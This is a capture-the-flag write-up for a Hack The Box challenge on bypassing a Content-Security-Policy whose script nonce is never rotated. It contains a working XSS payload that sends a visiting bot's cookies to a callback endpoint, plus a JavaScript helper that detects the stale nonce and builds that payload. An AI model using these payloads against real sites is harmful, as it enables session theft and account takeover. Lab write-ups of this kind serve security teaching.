https://app.hackthebox.com/challenges/811

Description

This policy is cursed, can you bypass it?

Exploitation

Looking at the code, the most developed part of the application is the request logging exposed over the WebSocket, so that is the channel to watch during exploitation. Connect to it with wscat:

wscat -c http://94.237.59.180:49425/ws

The nonce is visible in the default Content-Security-Policy the application displays, and because the policy is stale (the same nonce is served again rather than regenerated per response), an injected script carrying that nonce satisfies the policy when the bot visits. This is the provided payload with the nonce filled in; it posts the bot's cookies back to /callback:

<script nonce="5247551b650fb492cdb1cad3fe71d337">
   fetch('/callback', {
       method: 'POST',
       headers: { 'Content-Type': 'application/json' },
       body: JSON.stringify({ cookies: document.cookie })
   });
</script>

Trigger the bot; its POST to /callback, with the cookies in the body, will show up either in the WebSocket log or in the Request History.

Note: Previously, the Request History feature was not implemented, which is why using the websocket was necessary to capture the information.
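The reason the bypass works is that the script nonce in the policy is reusable. The following is an added example (not part of this write-up or the challenge code) that parses a CSP header, extracts the script nonce, checks whether the nonce repeats across responses, and assembles the exfiltration payload from it. The header strings are constructed for illustration (the nonce value is the one shown above), and the callback path defaults to /callback as used in the challenge.

```javascript
// Added example, not the challenge's own code. Sample headers are constructed.

// Parse a Content-Security-Policy header into { directive: [sources...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [directive, ...sources] = tokens;
    policy[directive.toLowerCase()] = sources;
  }
  return policy;
}

// Return the nonce accepted by script-src (falling back to default-src), or null.
function extractScriptNonce(header) {
  const policy = parseCsp(header);
  const sources = policy["script-src"] || policy["default-src"] || [];
  for (const src of sources) {
    const m = /^'nonce-([A-Za-z0-9+\/=_-]+)'$/.exec(src);
    if (m) return m[1];
  }
  return null;
}

// A nonce-based policy is "stale" when every response carries the same nonce:
// an attacker who has seen it once can reuse it in injected markup.
function nonceIsStale(headers) {
  const nonces = headers.map(extractScriptNonce);
  if (nonces.length < 2 || nonces.some((n) => n === null)) return false;
  return new Set(nonces).size === 1;
}

// Build the cookie-exfiltration payload carrying the reusable nonce.
// callbackPath is an assumption; /callback is the endpoint used in the challenge.
function buildPayload(nonce, callbackPath = "/callback") {
  return (
    `<script nonce="${nonce}">` +
    `fetch(${JSON.stringify(callbackPath)},{method:'POST',` +
    `headers:{'Content-Type':'application/json'},` +
    `body:JSON.stringify({cookies:document.cookie})})` +
    `</script>`
  );
}

// Constructed: two responses that serve the same nonce (stale policy).
const STALE_HEADERS = [
  "default-src 'self'; script-src 'self' 'nonce-5247551b650fb492cdb1cad3fe71d337'; object-src 'none'",
  "default-src 'self'; script-src 'self' 'nonce-5247551b650fb492cdb1cad3fe71d337'; object-src 'none'",
];

// Constructed: a correctly rotating nonce, for contrast.
const ROTATING_HEADERS = [
  "script-src 'nonce-aaaa1111'",
  "script-src 'nonce-bbbb2222'",
];

function main() {
  console.log("stale:", nonceIsStale(STALE_HEADERS));       // true
  console.log("rotating:", nonceIsStale(ROTATING_HEADERS)); // false
  console.log(buildPayload(extractScriptNonce(STALE_HEADERS[0])));
}

main();
```

Against a live target the same check is done by fetching the page twice and comparing the Content-Security-Policy headers: if nonceIsStale reports true, the payload built from the observed nonce will execute in the bot's browser despite the policy.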

Summary

Cursed Stale Policy: the CSP nonce is stale, so an injected script that reuses it satisfies the policy and runs in the bot's browser, crossing the web trust boundary; its cookies are posted to /callback and read back through the WebSocket log (or Request History) to recover the flag.